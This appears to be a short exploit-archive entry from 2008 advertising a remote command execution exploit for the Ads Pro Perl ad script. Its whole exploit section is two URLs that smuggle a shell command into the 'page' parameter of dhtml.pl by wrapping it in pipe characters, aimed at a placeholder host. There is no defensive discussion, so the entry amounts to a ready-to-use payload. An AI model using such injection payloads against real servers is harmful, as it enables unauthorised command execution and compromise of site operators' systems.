id: 3957
date: 10/25/2008
title: Ads Pro (dhtml.pl page) Remote Command Execution Exploit
author: S0l1D
cves: 

========================================================
Ads Pro (dhtml.pl page) Remote Command Execution Exploit
========================================================

<~\Adspro Script Remote Command Execution/~>

[~]Author       S0l1D
[~]Script        Adspro
[~]Homepage http://adspro.mhfmedia.com/index.shtm

**
~\Exploit/~

http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_top.htm|id|
http://serv.com/cgi-bin/adspro/dhtml.pl?page=advert_login.htm|id|



#  0day.today [2023-03-22]  #